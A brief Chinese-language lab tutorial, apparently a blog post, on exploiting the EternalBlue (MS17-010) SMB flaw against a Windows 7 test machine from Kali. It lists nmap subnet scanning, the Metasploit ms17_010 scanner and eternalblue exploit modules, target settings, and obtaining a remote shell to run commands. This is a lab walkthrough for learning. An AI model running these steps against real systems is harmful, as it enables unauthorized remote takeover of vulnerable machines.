永恒之蓝

162 阅读1分钟

概述

  • 利用文件共享的445端口发起的攻击,通过445端口实现执行系统命令;

步骤

  • 实验环境:

    • 靶机:win7
    • 攻击主机:kali
  • 扫描目标网络主机及端口情况;

  1. nmap 目标网络IP/子网掩码
  2. nmap 192.168.126.0/24
  • 加载攻击msfconsole工具
  1. msfconsole
  • 搜索永恒之蓝相关工具
  1. search ms17_010
  2. exploit/windows/smb/ms17_010_eternalblue #攻击模块
  3. auxiliary/scanner/smb/smb_ms17_010 #扫描模块
  • 加载扫描模块
  1. use auxiliary/scanner/smb/smb_ms17_010
  • 设置目标靶机
  1. set rhosts 目标IP
  2. set rhosts 192.168.126.138
  • 运行扫描模块,判断是否存在永恒之蓝漏洞
  1. run

image.png

  • 加载攻击模块
  1. use exploit/windows/smb/ms17_010_eternalblue
  • 设置攻击靶机IP
  1. set rhosts IP地址
  2. set rhosts 192.168.126.138
  • 运行攻击模块
  1. run

image.png

  • 获取shell权限
  1. shell
  • 修改命令窗口编码为UTF-8
  1. chcp 65001
  • 根据需要远程执行CMD命令 image.png